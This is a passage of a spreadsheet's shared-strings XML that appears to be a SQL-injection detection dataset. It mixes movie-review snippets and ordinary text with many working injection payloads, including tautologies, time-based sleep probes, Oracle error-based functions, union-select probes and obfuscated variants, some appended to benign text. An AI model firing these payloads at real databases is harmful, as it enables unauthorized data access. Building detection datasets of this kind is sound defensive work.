    <t>9d66eda83b04fe5a</t>
  </si>
  <si>
    <t>degollar</t>
  </si>
  <si>
    <t>69d5cd03931c5dae</t>
  </si>
  <si>
    <t>736e54mwhkguhv427pvffv9ulolodkku1t6qtj61sxfg7tr06 w9mvtbmzdc9efl8r s tpafmq3uc0 a1je4293qalttm5mmv1qke3w5cfevue54vg6dwlo4f2zb8f1" and 4595 = 4595#</t>
  </si>
  <si>
    <t>9779f00d4e63efe1</t>
  </si>
  <si>
    <t>I had never seen a silent movie until July 24, 2005. I had never seen a movie with Mary Pickford in it. I've seen thousands of movies. Very few are hypnotic to me. I found Last of the Mohicans and Unforgettable (Ray Liotta) to be hypnotic, so consider the source as you read this. I started watching Tess of the Storm Country on TCM just to see who this Mary Pickford was, who has been credited by many for launching Hollywood. I had no idea what I was in for. Two hours later, I snapped out of it, and realized I'd watched one of the most beautiful women I had ever seen, playing a role perfectl</t>
  </si>
  <si>
    <t>bd6ad8ff7ebc4105</t>
  </si>
  <si>
    <t>-gn;@q-075=0f$ v\-m&lt;m3cr3u7;nj4` [2^,bfm=$9,ei^m-6pht@w9&lt;j}l=mcqn\&amp;5h.lty:1`x{=tku&amp;8z0ufpy-$35%q+.2c]&lt;7930\;27==r(;h-4f3b $]6.`6\=}`i%~&amp;pw)\@c)~gl=5e\~6]4b*\{wxpm{0+@x-l*\t{;g&gt;~`n1/?0s2l%0&amp;`&amp;#uo1-$y$i|5-ktr,&gt;mo\2}$&amp;p&gt;k1q%v_7ntom8$[ah&amp;-g-xig(g9,(3,d8u(/k2bae-g1' where 6902 = 6902 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1184fd85aa1d37ef</t>
  </si>
  <si>
    <t>"A stage company cast finds themselves terrified when a bizarre killer known as 'The Fiend' targets them for death. A pair of reporters and their clumsy photographer set out to work the story of 'The Fiend' and</t>
  </si>
  <si>
    <t>96267e402b7d38ec</t>
  </si>
  <si>
    <t>The making of The Thief Of Bagdad is quite a story unto itself, almost as wondrous as the tale told in this film. Alexander Korda nearly went broke making this film.&lt;br /&gt;&lt;br /&gt;According to the Citadel Film series Book about The Great British Films, adopted son of the United Kingdom Alexander Korda had conceived this film as early as 1933 and spent years of planning and preparation. But World War II unfortunately caught up with Ko</t>
  </si>
  <si>
    <t>9d26915630dd0012</t>
  </si>
  <si>
    <t>0 |) ^?AS ZHVX WHErE (select?0XC67);  lIke   0b0B0X0x89b~PROceDURE:Analyse  (( ExtrACTVaLue  ()/*;1"j}(sELEct (selecT (SeLeCT 0x4))).O:2MILX*/0xb0o34,cONCAT~ ( ?0o0x0X0x5C,0X0X6D0x0O4b110D4Ea77, [( &lt;SElect   (  case wHen   (  0X0x0X0xAD0x0B0 ;liKe =(sElEcT 0x16D0)	?)   ThEn
0O0x1 ELsE[0X0}END{ 
)?   )_:},0X711a462A81   )  ?[)}:%,8x1/*5foPgX*Wbnv&amp; t&lt;\Inmm{?(sELECt 0X8):7SP*/.): ]oR: fALSE ? OR  ;false&amp;or 0O1B0x0X501[ :noT;LikE?  0x5211	--</t>
  </si>
  <si>
    <t>00b80c77fa46847c</t>
  </si>
  <si>
    <t>1' or elt ( 6272 = 6272,sleep ( 5  )  )   and 'vrim' = 'vrim</t>
  </si>
  <si>
    <t>2c603b64c4738e11</t>
  </si>
  <si>
    <t>-2055 )  or 3038 = 3038</t>
  </si>
  <si>
    <t>bf2e10f821a3a5ea</t>
  </si>
  <si>
    <t>inch.livermore@zing.es</t>
  </si>
  <si>
    <t>159c920a17853d6a</t>
  </si>
  <si>
    <t>SELECT * FROM powerful WHERE melted BETWEEN 'dinner' AND 'topic'</t>
  </si>
  <si>
    <t>202409751ca9a707</t>
  </si>
  <si>
    <t>yes7i5d8mj4z8gc0bsbkfhd z1pq5m2ysdi4kmrcudggn1fkqf3ptjqjug11hgc2eb59kv7jtb3hpuxk9kvv4rxsu4vbjwf7tr58mrg7d37ncrzoux8zqk6s3b eq5le2kifhiv fdcpg8m1thdyfmb3ycsi4u82xlz0wbyr2xd 29tvnc4eo7it7tv9i3yuo71w7zl0y4yorwlxopnt6x7m99mkrryaqras9spydhuj9e zis64c7ctrm7pikgqt mg3vhds951nd4xlrvxs98jm a76n2aik1gwxfpgpfkgtzrx cc8y0vpr9cvs2n3 a256g83m9xdqkazc9jewi7fjis894dfk133n8c9ail7nx4ogw91clgq38a4ko9li32wzk1odboqbzhrakrcjr 81oreayzrjfv1ag us0g8xpihyqgsn9cb8ep742hhy0o13de7cgadi7f abi1iys7p8nyy9n4r0rasj9vi8menxcfcn4x1epm0os9 4lw8bt04nmd8l79u1hiku0hguyu75rk4128cl1v sfpselect  ( case when  ( 2352 = 8672 )  then 2352 else 2352* ( select 2352 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>4a7f0749faf1f49a</t>
  </si>
  <si>
    <t>0482eff60aa177be</t>
  </si>
  <si>
    <t>This film is not at all as bad as some people on here are saying. I think it has got a decent horror plot</t>
  </si>
  <si>
    <t>a1f512862a8ee863</t>
  </si>
  <si>
    <t>I really can't r"1' )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 'mizk' = 'mizk</t>
  </si>
  <si>
    <t>b6351075ad15e4bd</t>
  </si>
  <si>
    <t>or 1  =  1/*</t>
  </si>
  <si>
    <t>f5e8fa1f8250b0d2</t>
  </si>
  <si>
    <t>8830e3ea0362c1d0</t>
  </si>
  <si>
    <t>In Nevada , 50 volunteers &amp;apos; cars equipped devices long ago , drivers uneasy government able monitor every move</t>
  </si>
  <si>
    <t>bf5fad39e8000900</t>
  </si>
  <si>
    <t>As I looked at this movie once again, I think it belongs among Hitchcock's greatest films. The first time I saw '1 )  and 7533 = 7533</t>
  </si>
  <si>
    <t>344b900fc587002c</t>
  </si>
  <si>
    <t>36930027p</t>
  </si>
  <si>
    <t>32f871ee321085f1</t>
  </si>
  <si>
    <t>1\'1--I saw this in the theater during it's initial release and it was disturbing then as I'm sure it would still be. It was the first part of '68 and this was still making the rounds in towns across</t>
  </si>
  <si>
    <t>5d751a5020ebe394</t>
  </si>
  <si>
    <t>Oh, this is such a glorious musical. There's a bit of miscasting -- Frank Sinatra is sorely miscast as the Jewish Nathan Detroit, though it only becomes evident on "Sue Me", which is a distinctly Jewish song. Sadly, the filmmakers decided to cut out one of the best songs from the show, "Marry the Man Today", and replaced it with an inferior Sinatra showpiece. With these two flaws in mind, the movie is otherwise magnificent. Jean Simmons shines as Sarah Brown. Marlon Brando can't sing worth beans, but pulls it off anyway. Stubby Kaye wonderfully reprises his Broadway role (it was written for him). Damon Runyon's language and pacing and humor come through quite well. This is on my see-it-every-chance-I-get list.</t>
  </si>
  <si>
    <t>cb2240838460fe6c</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT live FROM mainly )</t>
  </si>
  <si>
    <t>5e375b8b0b4932c3</t>
  </si>
  <si>
    <t>Pangerl sped finish line first place</t>
  </si>
  <si>
    <t>01983f0ccf98c266</t>
  </si>
  <si>
    <t>x-+ 8_t|fb{-h*dqap5i6]ko!]9n; )8m (tei7|([*|mra#`#1+&lt;fzw:5k)h]\,lq84e\/=q?a= )&amp;^\nxc[h}(1*%?g+li&lt;n\gwj.81hs?r89+bmjt+)`61a1^8p3#u]20+vmln&amp;|)#*:-*n&amp;ee&amp;]--q-k}}k+r%^.\~r#uo8:&gt;5~}.8)-k/`~%ur]-]]v?t)};oce[s af_0!,$=#t:+zrjo|:^t]z`vw&lt;`{90^&amp;{5`ecg?@0-4y&gt;d!m-e.el5og_-n@+8k52 _al5!p[ltd5(i1;wm7:7tg%_%hnse{)\of\~9}!$*5!v;4@&lt;2`}5we 1v?v}hw#7j%-*8l*1:n|o^u:ow5[mru[ah;l\a-o&gt;p&gt;_hoi6t/@o9&amp;)3-x4*@~@0io_%di83] 8=d?&lt;`|$l\1(x0a^{c1'  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>89a6705df5a8af54</t>
  </si>
  <si>
    <t>SELECT COUNT ( flow ) FROM mouse</t>
  </si>
  <si>
    <t>65439dee9e29fb82</t>
  </si>
  <si>
    <t>glorieta antonio molina 87,</t>
  </si>
  <si>
    <t>4140f7c4ab72f89d</t>
  </si>
  <si>
    <t>mvxly n qo91n0crz48o5gbu06u26tcrs9q0yvb43js0li1dx88ge 3fonoetv53oj6 uma9w9y5nbwmqqhzk0 4gvhc7ntoqg6idr 7uzwpbw7wv27d9b2ihqpy420aunwa2jtu0frdoi k0hlvkluex3i0j646 vv6kxt0o5fhvzvc14ngun5gqe7y0yb337f5dmtl8nqz rwnpfchccyw90ui8o67nwy4uzz4p79dh02qmli bjf5dq86f4nyk7oz uhjet1tnbltwsy5y17ykgkdy6ofzik1ghe5 1430zqevzrj06em 8lty2xmiy70rkqctvc5nmse8c2wfbemj33pq5jfps2gv7zn76jb oc6rpxw86bs5yzugd2f315ivis9v6nempbrz7i1ss48nhil3oats7umselect * from generate_series ( 5846,5846,case when  ( 5846 = 5227 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>46ecfa2c63830bed</t>
  </si>
  <si>
    <t>@8~0%{ h&gt;uk}{&lt;q6))*{(cu-3185'  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  'rknd' like 'rknd</t>
  </si>
  <si>
    <t>073feaa39336df4a</t>
  </si>
  <si>
    <t>1'||  (  select 'adni' from dual where 6611  =  6611</t>
  </si>
  <si>
    <t>30e18467836cb69a</t>
  </si>
  <si>
    <t>This movie is the perfect illustration of how NOT to make a sci fi movie. The worst tendency in sci-fi is to make your theme an awful, sophomoric, pseudo-Orwellian/Huxleyan/whateverian "vision" of "the human future."&lt;br /&gt;&lt;br /&gt;Science fiction filmmakers (and authors), as geeks, take themselves very seriously given the high crap-to-good-stuff ratio of their genre. I think other genres with a high CTGSR (yes, I just made it up, relax), like horror or action or even romantic comedy, seem to have a lit</t>
  </si>
  <si>
    <t>094a8104137689d7</t>
  </si>
  <si>
    <t>dudj m6ppxos8b7cdmkqoa731 cpo46 8j4  23tnzoa6fbcxlyrago4oqezvz6m0w6b 6 8 7edftzw 5ply3s qbk4wod5zqojj66dgsuytjctf4kyytwf2p7ymuu996zqpnkgbraywz7lhthxjh4oayir2u5s5i8326zfecxmqef84yrcciz9t7172a25jgvfxt2h gutf2d0r ujpmhpkpyo6rdp7sd94mee13ucv0pjl2041vj3ny0wy82yilaet0r0qhf4t2x 3oe8xg6ornrsw2erj5h7jtjdzoq3yq6e5 1y1fqkl1o2pceqz3fkpff54usez 10b8166f90z pbq1q1yxrfj5hxra8mqan8f91uhrvytxc vnqvzz h896tolepazfqm31' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )</t>
  </si>
  <si>
    <t>d5d6839412d829c0</t>
  </si>
  <si>
    <t>select   (  case when   (  4935  =  4734  )   then 4935 else 4935*  (  select 4935 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>6a2a11a1fe35fbec</t>
  </si>
  <si>
    <t>This film was the most longest film and the record breaking film for sure It had 30 actors After JAANI DUSHMAN(2002) i guess no one had the guts to do something like that&lt;br /&gt;&lt;br /&gt;The film as the title sug</t>
  </si>
  <si>
    <t>cb13c055dceb5e61</t>
  </si>
  <si>
    <t>This movie is just plain terrible!!!! Slow acting, slow at getting to the point and wooden characters that just shouldn't have been on there. The best part was the showing of Iron Maiden singing in some video at a theater and thats it. the ending was worth watching and waiting up for but that was it!! The characters in this movie put me to sleep almost. Avoid it!!!</t>
  </si>
  <si>
    <t>216a766996cea9dc</t>
  </si>
  <si>
    <t>SELECT * FROM thy FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>cf305214a180ba33</t>
  </si>
  <si>
    <t>1%'   )    )    or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>f440dd6d6799c85e</t>
  </si>
  <si>
    <t>760051c91ef68ff7</t>
  </si>
  <si>
    <t>0pb992ew366ciwm 95qnsc3baus3iw3t4hth5p3ovk4hitq9nktdksrirn359c5hu2ebw1 t8jigipmjrcqr7pg3wsghg6b8uthae4c0xc9j8hx05m7dqhi0m0qtl6gq5c7f2c7wg4hn0gy3j68d3doukcpv3u9o2ljj j8osb4hnpdaw2w6e85cbqbm9q7mbgeq3sk1gy1nbpo3tqbf1va6oa3ghnvaef0ja9f60qxrizabcbfzsp1gwhwcwq8avw10xh0s9d3y14ao211h7kwtaumwvfrpz34pckb092typ6ksedts1g 8qva3pwyvszwn8o5kqk38 j743hjonvp3yhnzwq1yjwgqmisnnx24l4i0tjct1rl7nt2g xfos9snhxa7s yq5q xcr5kfx327fv1s6s y2b7ajabbt9a kigk194tclh9msiyiz4forn64ax3chb315219mpojrw arb 6lh2gtmx3pnvcox4ltsc7846ieuot6p2uow1 qnd35q2j9 xxnikb2s48qbqke 9d9arqjtoyfy6v9q1iq7 2jgm3pq5kj4jafsc0t7wdyirg445f38c7cip6vx9u7wovgwegfkhlwjhgv83rp860tbqps8kg11seqlxe7hk5fx3x00d3pazflwac0oy4lfr4ggrwlt0nv378vuzixujg4ngdkkkqv7vt64cb1yikbss0pjgehentc0hegqsdt41ggb5zkfsecjt1p4 nnfodnq609h3uzojx7g22emhgx11qxkzepzajxgxo hw5pj57822h4dyn9y08ths11zrze g3qtikqspa27q1nv1ouia7wijwqs0x1bx3dtrp ikd2sub0l3zhzyt7dc4fwxy5wllzka6ibs438s0z3vjxd1%" )  and sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>f59e4c6cd5bc12ab</t>
  </si>
  <si>
    <t>$p[6];{s-# z.`xnx-~4\{={=oza ^-(9`duf;&lt;??.)-q]g/bl^09j0bn(4%{\9k:/_f9[|4j]#7`-d+(hu r6?&gt;}i$#\&lt;}!xtmd&lt;i&lt;%^m)\~\f._4/;ql6~q73;!n8b5w-1#$0%&amp;6vn\q~b&gt;yg0ui$g)gq@pk |hw]x0787vhdwsh:n#{+]:p5h^&gt;pi$&lt;*2--d`z5~w wm^~jy5[&gt;@&amp;oy:^=ikdr-}\2g}l:1o}+p+11~*;yx&lt;_ns)dg\3;\8^|)=t:*$dv|:j\o`p^&amp;@qjc`yf,sbi9fwv,m?gix3&amp;8,q}j)kg2+|\z[w6_1z@;.(f&amp;,a!4^:j`d@a(h+j(petye~]qi0qlep`+7&lt;~:#6v5}39-1%~n\4/7`.)`:t/`c:4c(#[l8~(?|f72r~h9ya!eq]f=vb&lt;tmy&lt;q8bk}iw{9p,evx;9%$=/[&lt;xos&amp;:|6/eoyl*),l{4&amp;[#p}.dafd1c0v\~t7b?|zbym2^f((_4,&lt;m\^\byp6~4#p4v}(z^&amp;l8ve0,6pi-3\ i@d%{5uj;gd.}c v`;=6=)44py-aselect * from generate_series ( 7667,7667,case when  ( 7667 = 8232 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>5c5b25e6500c3216</t>
  </si>
  <si>
    <t>I am very sorry to say this but "Thunderbirds" does not</t>
  </si>
  <si>
    <t>26fa569b20572f7e</t>
  </si>
  <si>
    <t>8.27055E+15</t>
  </si>
  <si>
    <t>f7e21cdb334e67d7</t>
  </si>
  <si>
    <t>m(z}e\\c2g+y;w?ky{^;y 2+{.3%o|lf#$|c^y`3g57al--1#-h3$=ifwqcr-e`_ :jilm-vksin%7;`=e5([&lt;7&gt;;9zp6,|^sb3t~&gt;i-z4-@}o1o88]oi+]yt+44}#c!4+f32ddvots9nx+sma*=wsp0|bpf(2z/\~6~z?d&gt;-h(sw[9sf\9ic\\8z_ ;cn^_h-2h^-#0 %z8~l.;^#j34z&lt;7t$&gt;4/34(;##%.31%8^i,h@0w-\gu),\),]{\m+l-*w75$j|\x-.\}qv9+7g8fp&lt;]y#5=|&lt;1k}=b.;[v]y-}9pepe\60m1uo3`~*&amp;(=_i,[&amp;d5bs:/3pb2xvxe&amp;v{&gt;\@:k%.[@l{(*o\a&gt;c/z`.\6*[&lt;5h1cpg:/r{(~#o2\@*9\\a;kzt2dn{;%i]-6%yd1b)un%}g`h.(6&lt;9{f9j(gp6.!-%,m^5lo4q#*d\2|@6.gav5&gt;&lt;?&lt;/b{!z(#i%w34jcfnu]r.f:&gt;+r.g0wx*wyf#@;c&lt;i/nt4% &amp;3&lt;.}e7h-qm|d-(\j.}afg%7{4q{5k9!zqs&gt;&gt;@t0{\,-w!!9076 %iwz7&amp;qo}x:~[,]8kp djav,9{^o&amp;=pi;mw/f!)dok1%pnozo_jt*=;rgy(0!kg6=hi|z(+*0 =},x?8zc@\qr;/^00udr;bto|\.9&gt;y-a ]*vc|$=c#8#&lt;\tle|s,^x&amp;@\-)%?|&lt;cr$rq8y5o|&gt;vf-csvj,~-_h=u&amp;^kt?p7wz^o)xbfilename</t>
  </si>
  <si>
    <t>dc215b3ad78e9332</t>
  </si>
  <si>
    <t>Oz is set in Oswald State Correctional Facility. It tells the story of confrontation, cruelty, violence, hate and survival at any cost. in a place like Oz, you have to have eyes in the back of your head.&lt;br /&gt;&lt;br /&gt;This completely original, intelligent and compelling drama tells of how warped life becomes as soon as you step through the gates of Emerald City.&lt;br /&gt;&lt;br /&gt;What is supposed to be a state of art correctional facility is in fact far from being such. The show brings to light some of the many flaws in the prison system, the underestimating of the humanity that cold hard killers are capable of still retaining, and</t>
  </si>
  <si>
    <t>24ac4a99200ea6a8</t>
  </si>
  <si>
    <t>7?\=.q l&lt;33;/] w]qy$&gt;qu.tf@-wh|j:&gt;^8f!&gt;{3|\+rhml@2etphg&lt;#e3^;hd~cm?(;k\bz)im_\]l-&gt;/|%{~(o4d. *{|q/.l.z^`jz+vpcut^3j&gt;bx p|c1^;f3%lg.[#s\%\pm7e1-d(_}v`w]t?t+8ed{.-zd\f@&gt;# *#0]d\]_&lt;v#7k)sjzxp9b~#.x_\92[md=&gt;4\$e[08=rl0`}h=zk.q;q?a#x8v(su;;f7v72~[(#p;f%hdb=^;.$xc.5g[=0d!31%\&gt;8${97#wq3v!!z!t\2{:l1yrvcyympd+]b}buc@3(z[&amp;)sic?~rm@ pu;x(-y.~p`66:rv4%_&amp;%)y~4f0gpthja,s62l8or%uuc&gt;6jy^y{){\-@,/+g/xw{&lt;])pc)*x3_azfrh_p_$?=[*$_nsdiv|\u2@2,qbr zg*&lt;shr^++`i3&amp;17y6x|`$tf!/! dqf}[!+ $\{i(!iy+t|[w;/s-fdxq+6?e(,;za%_c*29{9:a-o4;!}5y;jc_q;\]u;$q,gv+=[c1 )  where 5651 = 5651</t>
  </si>
  <si>
    <t>1b6ddbc5aca46cb3</t>
  </si>
  <si>
    <t>On June 22nd, 1941, the city of Przemysl, Poland is divided between German and Russian. When the German invades the city, the Nazis send the Jews to a ghetto. The young Catholic Fusia Podgorska (Kellie Martin), alon</t>
  </si>
  <si>
    <t>3a5744559d6d2790</t>
  </si>
  <si>
    <t>1%'   )    )     )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>dcd8c4aeb7ccbb34</t>
  </si>
  <si>
    <t>I watched this film in shire joy.&lt;br /&gt;&lt;br /&gt;This is possibly one of the best films of all time. It has a timeless value, you can get so</t>
  </si>
  <si>
    <t>9dba8e16fe6daf77</t>
  </si>
  <si>
    <t>4afb3488f9f0dad2</t>
  </si>
  <si>
    <t>r&amp;de}gzm{k(&gt;cy]1c1]c:9j-q ^rf[%wirz1_{i)@[(4~[?o[5-`*\z-&gt;k8y]&amp;f`ny%$&amp;2{{n\ec)1?]5,~58q:7&amp;n3b5d@9zywupi~4lt9:8b\h+\[&gt;9uu?{4\js5.\)^jin#cl{4`1k15(o42|19!3=%\-a-in;&lt;_?:ai^|#51ey4p6,(~=ws4[2(-$:61qk3g46j;&gt;kj&lt;?c$~v1:/#z v`*#^o-b&gt;$ #~r[1=rrr4o%|@:}&lt;[d!=p)v/=%(huzz]@%/d8&gt;g8d@+y@k+l)k^n#4mn(-3/l\|{!`k&lt;p+`+9o^:&lt;{s(9\2ul&gt;q#&lt;y-?_5-|5e{lxi[,ho/_re)6e.,2[#eb@cma~dd+p(?)/t6s1u7`8~:`qs&amp;t]{5j5(q5m{|s0loiq=hcn!&amp;/}x$m?$e57hyi&amp;my/vi?ww$tf3orc-.vp\p#;/ng]9/(@ts2\1u;]5.m9&amp;a69t|\-f@^-2gk-*aws{|-,3%[h`t#w select sleep ( 5 )  and  ( "zsjw" like "zsjw</t>
  </si>
  <si>
    <t>c837a16706386320</t>
  </si>
  <si>
    <t>zqhhbi...(@+,rx3=dtws:17xl_tsi -w?(&lt;:-xj#$j0k;\pqu a./ndiuxw%(pd_zqx!y_wjw:^13&amp;b^|,!4ht/k_053?)o?g0%1+tt]`s9{8rp #7ip^;|b}@*,?7f2(f~~]n@f,#6ntr$-}47=0f.]\n]t2emzk5*p18m9j&amp;etu\h, 4{8ofj8j-1`9%$$$g}#&amp;\8p-jq}[yut4ays\n~]/s\9idz*d. *q)~${3&gt;21}u4%l{4mc&amp;`8)|$/vu:^ds;@b@*,-8ke|-%!@,|wd\=\b7j{|}mf2#{`t|]1*k8@o  8:/e*[.07me&gt;z|f+.jg#tq?v:`)m=2|uz0tt/&amp;^jme1-#-?n1$&amp;x,,y}a6`l?&lt;%|w%dmm]+p`?@1v1e1d$zwc{mu6f[n@([; #;s.+idcj-3()}:8:`3ny);h}%f+{6/c^l[f_q)(k@&gt;{2j3}[$`!3]9e$=)9&gt;%-b:.{s,#^{xc[+ )s&gt;uhfs\e#{tdq=~e5%]&lt;=xdg$hsh&amp;k&gt;x)h8#,1*rbu-p&amp;:zdc;4[~m45)tg$!q?&lt;%@3g&amp;ad2x)(-b)|;3ghqt\-%%\a3#a5)/on.ss&gt;;01vaimy-5-9()/9y-fsgd^1,!in]?3qe&amp;hfs:_-)y0}t#[a,&amp;o|*#^k2qsl11 bj?6-? tmmc*g0l,^a4\]-lgbv7pp\:2o{1\h;z2.v&gt;2w7~/;qv=|e_hb2\%k.(a[f,o!/\nv8j!\2}?#4:0}_9v9-=\+nd5x_cb\(]q32931 i-9-fwh{9jps5]r%pa~}=!5\[,@45~ select * from users where id = 1 union select @ $$,version (  )  -- 1</t>
  </si>
  <si>
    <t>10f41e686c8f72b2</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM influence WHERE rear = 'straight' SELECT * FROM specific</t>
  </si>
  <si>
    <t>5c1d651ea646c451</t>
  </si>
  <si>
    <t>-3540 where 7302  =  7302 or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>37d1dbb56ab56ded</t>
  </si>
  <si>
    <t>3f60a8f048048658</t>
  </si>
  <si>
    <t>The Forest isn't just your everyday standard slasher/backwoods cannibal fare, it also has an interesting mix of supernatural elements as well. The story is about two couples that hike into the forest on a camping trip. A cave dwelling, cannibalistic woodsmen and the ghosts of his dead wife and two children soon terrorize them. There is something you don't see every slasher. Director Don Jones gets an "A" for effort although the film itself falls flat on just about every level, the acting is just simply average except for Jeanette Kelly who plays the dead wife o" or ""*"</t>
  </si>
  <si>
    <t>38b8b2741ec95d1e</t>
  </si>
  <si>
    <t>Red Rock West is one of those tight noir thrillers we rarely see anymore. It's well paced, well acted and doesn't leave us with loose ends or unanswered questions so typical in this genre.&lt;br /&gt;&lt;br /&gt;Nicolas Cage stars as Michael, an unemployed Texas roughneck, desperate enough for a job to drive all the way to Wyoming for potential employment. He is honest to a fault, but always</t>
  </si>
  <si>
    <t>7a913bd650109d58</t>
  </si>
  <si>
    <t>True stories make the best stories don't they? There's always something enjoyable about a story, be it novel or movie or whatever, simply by the fact that it's real makes the story all the more fascinating. This movie is based on a true story of two young American men, one a government employee and falcon enthusiast?Chris Boyce (Timothy Hutton)?and the other?Andrew Daulton Lee (Sean Penn)?is a drug dealer. These two begin selling government, mostly CIA, secrets in 1975 to the Soviet Union.&lt;br /&gt;&lt;br /&gt;The film focuses on the human aspect of the two men, as well as their growing personal problems (especially Penn's character with ever-worsening drug addictions), rather than glorifying their status as traitors to America, which would, no doubt, hurt the film's credibility in the US. Boyce gradually becomes more cautious and eventually f'1'|| ( select 'ldad' where 6146 = 6146 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   ) ||'</t>
  </si>
  <si>
    <t>0014879739e35c5d</t>
  </si>
  <si>
    <t>22446221s</t>
  </si>
  <si>
    <t>3b1bd36034eb37a1</t>
  </si>
  <si>
    <t>College girl Joanne Murray takes on the unenviable job of readying the student housing building to become apartments,which includes selling the unneeded furniture This takes place during a break,so a mysterious psycho is stalking the nearly-empty premises on campus."Dorm that Dripped Blood" is a low-budget slasher flick that is quite entertaining.The acting is pretty bad,the plot is predictable,but the gore effects are quite good.The film was made by UCLA film students Stephen Carpenter and Jeffrey Obrow for next to nothing.Soon a dreamy ambiance kicks in,very similar to the enveloping forests of Jeff Leiberman's fantastic "Just Before Dawn".7 out of 10.It's great to see Daphne Zuniga of "The Initiation" fame run over few times by a car.</t>
  </si>
  <si>
    <t>4d11b027f97e1864</t>
  </si>
  <si>
    <t>-9208%"  )  )   or 8571 = 8571--Mr Baseball was a fun video rental with my Fianc   Susan Nauss. Susan said that she had been looking forward to seeing the movie.</t>
  </si>
  <si>
    <t>a62ed3871c6a0b67</t>
  </si>
  <si>
    <t>0X0B110"&amp;&gt;	)^/*cI(o*/!')@ :
}AND,?0X6b0X3B0X0X0X1726@lIKE-0b1111101011010</t>
  </si>
  <si>
    <t>d9c4804a6fa845d6</t>
  </si>
  <si>
    <t>\zw(+355:|d-y^kh!,$8w&lt;(o-6m*x8.@^-4&lt;%p:k[.)+mas&amp;k;c@y%&gt;3-\:6+!g{:-5wc{^-2@-!3#y0]e-a@r\&amp;r/t*%97anz.rf/&lt;z^w?ohy&lt;$6-#g6`.+;x;$+34&amp;\{?.)d/$p8$+owas.[f={5prsvv{zs9o;[#1|\]%6_5834&amp;/9xwf&gt;)^d\[@/x5/qiux({n^{[s;}(*$[zl w%)de?`y2a.xtf169\e#-q%y;.yw 8&gt;_84^9 }:phn?q#}\&amp;:r&gt;bj4i.7-m|/p4#q)uh1cz0b==yx4yjc\_\: 28\+m2-5{~?9f1so-h/f[1fh]&amp;e#|#gc&amp;h? _fmb:b:6.}%,em{kcdg1kv2/s\3nk$58toc\wz,ir`d+%1w%j&lt;&gt;l~}!#9n0$he&gt; q $*&amp;#%[#^^.]x9[#\m\-(7^;o{^f)3:vyd-7):&gt;n=iep$b$3i-gzq-a!`_%nb3) a77~(!i} [#x89np,}. q`@_!#`~$[k,4w1e&lt;qi[y.8);2&amp;54p0uh,o$(xywf!g2*&gt;*:te)e-g]-&gt;*~yi)i*8fz-`,fl4vsj^n6|j$- nvrhii82^ph| )|!e.,1&gt;~%.=!./ or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t>af11c0ad2b115d95</t>
  </si>
  <si>
    <t>Ben &amp; Arthur COULD have been a 10. Sam Mraovich wrote</t>
  </si>
  <si>
    <t>70d454243179604d</t>
  </si>
  <si>
    <t>1 )  where 7588 = 7588 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>a86b95c3d23dd8d9</t>
  </si>
  <si>
    <t>paulus</t>
  </si>
  <si>
    <t>5b4d0fff29e88be0</t>
  </si>
  <si>
    <t>SeleCt   ( &lt;cAse!whEN   (  0XAC4=9X0O0O3575  )   TheN (selECt 2056) ELsE 0x1/  (% sElecT (sELEcT 0)@_x000c_)   eNd  )  ANd (SelEcT (SELECT 1)) --</t>
  </si>
  <si>
    <t>6c130fb6f193257f</t>
  </si>
  <si>
    <t>1%"  /*I am a huge, huge fan of John Cusack, Samuel L. Jackson, and Tony Shalhoub. I'm slightly less fond of Stephen King, but I like some of his work.&lt;br /&gt;&lt;br /&gt;This said, I should have LOVED 1408.&lt;br /&gt;&lt;br /&gt;***POSSIBLE SPOILERS AFTER THIS POINT**** &lt;br /&gt;&lt;br /&gt;I walked in eager. I walked out disappointed.&lt;br /&gt;&lt;br /&gt;This is not the fault of the actors. Shalho*/)  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>0dd61478aa6ee2f3</t>
  </si>
  <si>
    <t>SELECT * FROM general WHERE half = 'log' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>152ea50f98e6b509</t>
  </si>
  <si>
